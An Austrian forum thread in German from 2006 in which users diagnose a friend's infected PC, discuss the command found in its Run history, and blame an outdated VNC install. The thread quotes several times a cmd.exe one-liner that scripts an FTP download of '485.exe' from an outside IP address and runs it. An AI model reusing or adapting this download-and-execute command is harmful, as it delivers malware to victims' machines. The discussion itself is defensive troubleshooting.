ein bekannter: "mein pc spinnt irgendwie"

Hier passt alles rein, dass nicht den oberen Kategorien zuzuordnen ist, und nicht gegen geltende österreichische Gesetze und/oder die Netiquette verstösst.
Forumsregeln
Hier passt alles rein, dass nicht den oberen Kategorien zuzuordnen ist, und nicht gegen geltende österreichische Gesetze und/oder die Netiquette verstösst.

Achtung: falls es eine technische Frage oder Beitrag werden soll, dann ist hier die richtige Kategorie fĂĽrs "technische Offtopic".

ein bekannter: "mein pc spinnt irgendwie"

Beitragvon s » So 31 Dez, 2006 12:02

auf die nachfrage ob er "spinnt irgendwie" genauer definieren kann meinte er das sich fenster öffnen/schließen und immer wieder was von selbst geschrieben wird...

unter ausfĂĽhren fand sich dann folgendes

Code: Alles auswählen
cmd.exe /c del i&echo open 85.119.186.43 2876 > i&echo user 1 1 >> i &echo get 485.exe >> i &echo quit >> i &ftp -n -s:i &485.exe&del i&exit
s
Board-User Level 1
Board-User Level 1
 
Beiträge: 626
Registriert: Fr 06 Feb, 2004 12:09
Wohnort: Celovec

Re: ein bekannter: "mein pc spinnt irgendwie"

Beitragvon preiti » So 31 Dez, 2006 12:52

s hat geschrieben:auf die nachfrage ob er "spinnt irgendwie" genauer definieren kann meinte er das sich fenster öffnen/schließen und immer wieder was von selbst geschrieben wird...

unter ausfĂĽhren fand sich dann folgendes

Code: Alles auswählen
cmd.exe /c del i&echo open 85.119.186.43 2876 > i&echo user 1 1 >> i &echo get 485.exe >> i &echo quit >> i &ftp -n -s:i &485.exe&del i&exit
Was sagt ein Virenscan zu dieser Datei?
preiti
Advanced Power-User
Advanced Power-User
 
Beiträge: 3691
Registriert: Mi 03 Mär, 2004 23:19

Beitragvon lordpeng » So 31 Dez, 2006 14:08

also wenn ich mich händisch zum ftp 85.119.186.43 verbind und die datei 485.exe runterladen will kommt nix, dürft aber mit ziemlicher sicherheit nix gutartiges sein ...
lordpeng
Moderator
Moderator
 
Beiträge: 10198
Registriert: Mo 23 Jun, 2003 22:45

Beitragvon s » So 31 Dez, 2006 14:32

mhm, war auch der meinungs das das kein freundschaftsbesuch war...
s
Board-User Level 1
Board-User Level 1
 
Beiträge: 626
Registriert: Fr 06 Feb, 2004 12:09
Wohnort: Celovec

Beitragvon jutta » So 31 Dez, 2006 15:28

der ftp-server meldet sich mit

220 Reptile welcomes you..
Name (85.119.186.43:jutta): me
331 Password required
Password:
230 User logged in.
Remote system type is StnyFtpd.

und dazu findet google einiges ueber diverse trojaner
http://lists.grok.org.uk/pipermail/full ... 26816.html
http://lists.openwall.net/full-disclosure/2004/09/23/33
http://lists.grok.org.uk/pipermail/full ... 26816.html
http://www.korelogic.com/Resources/Tools/MISC_LIGHT.lib
http://www.nabble.com/New-Virus-Worm-t243748.html
http://www.fortinet.com/VirusEncycloped ... fid=115957

und noch ein ganzer haufen ...
jutta
Administrator
Administrator
 
Beiträge: 30485
Registriert: Do 15 Apr, 2004 10:48
Wohnort: wien

Re: ein bekannter: "mein pc spinnt irgendwie"

Beitragvon Air20 » So 31 Dez, 2006 15:54

s hat geschrieben:auf die nachfrage ob er "spinnt irgendwie" genauer definieren kann meinte er das sich fenster öffnen/schließen und immer wieder was von selbst geschrieben wird...

unter ausfĂĽhren fand sich dann folgendes

Code: Alles auswählen
cmd.exe /c del i&echo open 85.119.186.43 2876 > i&echo user 1 1 >> i &echo get 485.exe >> i &echo quit >> i &ftp -n -s:i &485.exe&del i&exit


genau dasselbe hatte ich schon mal...
bei mir war eine alte vnc version schuld,
die eine sicherheitslĂĽcke hat und anscheinend
durch sowas wie einen wurm ausgenutzt wurde...
connected by
xDSL Business silber @16384/1024 flat
inode Etherlink flat @
Bild
und aon Gigaspeed 16 @12352/1024 :rofl:
http://www.youtube.com/watch?v=PtXtIivRRKQ
Air20
Board-User Level 3
Board-User Level 3
 
Beiträge: 1360
Registriert: Fr 16 Apr, 2004 18:32
Wohnort: 2540 Bad Vöslau

Beitragvon lordpeng » So 31 Dez, 2006 16:07

>bei mir war eine alte vnc version schuld, die eine sicherheitslĂĽcke hat und anscheinend
das vnc nicht sonderlich sicher ist, is leider nix neues, drum verwend ich es schon lang nimmer fĂĽr fernwartungszwecke
lordpeng
Moderator
Moderator
 
Beiträge: 10198
Registriert: Mo 23 Jun, 2003 22:45

Beitragvon Air20 » So 31 Dez, 2006 16:15

lordpeng hat geschrieben:>bei mir war eine alte vnc version schuld, die eine sicherheitslĂĽcke hat und anscheinend
das vnc nicht sonderlich sicher ist, is leider nix neues, drum verwend ich es schon lang nimmer fĂĽr fernwartungszwecke

ich verwends auch nicht...
aber der edv betreuer von demjenigen
dem der pc gehörte hat ihm den s*it installiert...
runter damit und gut ist es :)
connected by
xDSL Business silber @16384/1024 flat
inode Etherlink flat @
Bild
und aon Gigaspeed 16 @12352/1024 :rofl:
http://www.youtube.com/watch?v=PtXtIivRRKQ
Air20
Board-User Level 3
Board-User Level 3
 
Beiträge: 1360
Registriert: Fr 16 Apr, 2004 18:32
Wohnort: 2540 Bad Vöslau

Beitragvon preiti » So 31 Dez, 2006 18:04

lordpeng hat geschrieben:>bei mir war eine alte vnc version schuld, die eine sicherheitslĂĽcke hat und anscheinend
das vnc nicht sonderlich sicher ist, is leider nix neues, drum verwend ich es schon lang nimmer fĂĽr fernwartungszwecke
Es ist zwar praktisch, bereitet aber auch wie gesehen viele Probleme.
preiti
Advanced Power-User
Advanced Power-User
 
Beiträge: 3691
Registriert: Mi 03 Mär, 2004 23:19

Beitragvon lordpeng » So 31 Dez, 2006 18:19

>Es ist zwar praktisch, bereitet aber auch wie gesehen viele Probleme.
unsere kunden werden nach und nach auf netop umgestellt, hat zwar auch ein paar macken, aber sicherheitsprobleme gibts da eher ned und von der performance isses wesentlich besser als pcanywhere und vnc ...
lordpeng
Moderator
Moderator
 
Beiträge: 10198
Registriert: Mo 23 Jun, 2003 22:45

Beitragvon Air20 » So 31 Dez, 2006 19:00

lordpeng hat geschrieben:auf netop umgestellt, hat zwar auch ein paar macken

Kommunkationfehler = 5 :lol:
connected by
xDSL Business silber @16384/1024 flat
inode Etherlink flat @
Bild
und aon Gigaspeed 16 @12352/1024 :rofl:
http://www.youtube.com/watch?v=PtXtIivRRKQ
Air20
Board-User Level 3
Board-User Level 3
 
Beiträge: 1360
Registriert: Fr 16 Apr, 2004 18:32
Wohnort: 2540 Bad Vöslau

Beitragvon lordpeng » So 31 Dez, 2006 19:01

>Kommunkationfehler = 5
nein, eher andere sachen ...
lordpeng
Moderator
Moderator
 
Beiträge: 10198
Registriert: Mo 23 Jun, 2003 22:45

Beitragvon preiti » Mo 01 Jan, 2007 11:32

lordpeng hat geschrieben:>Es ist zwar praktisch, bereitet aber auch wie gesehen viele Probleme.
unsere kunden werden nach und nach auf netop umgestellt, hat zwar auch ein paar macken, aber sicherheitsprobleme gibts da eher ned und von der performance isses wesentlich besser als pcanywhere und vnc ...
Ich glaube das liegt wie bei vielen anderen Dingen(Telnet,.......) daran, wann es entwickelt wurde. Da waren die Dinge die heute die heute Probleme bereiten einfach noch kein Problem.
Aktuellere Software, deren Entwicklung später begann, nimmt einfach schon Rücksicht auf diese Probleme.
preiti
Advanced Power-User
Advanced Power-User
 
Beiträge: 3691
Registriert: Mi 03 Mär, 2004 23:19

Beitragvon -slcp- dark » Mo 01 Jan, 2007 12:05

Hier ist ein Artikel zu diesem Thema.

lg
!nodE xDSL Privat medium 4096/512, unlimited -Xp- ~NOSCE TE IPSUM~
-slcp- dark
Board-User Level 3
Board-User Level 3
 
Beiträge: 1300
Registriert: So 18 Sep, 2005 09:11
Wohnort: Nö


ZurĂĽck zu OFFTOPIC

Wer ist online?

Mitglieder in diesem Forum: Yandex [Crawler] und 15 Gäste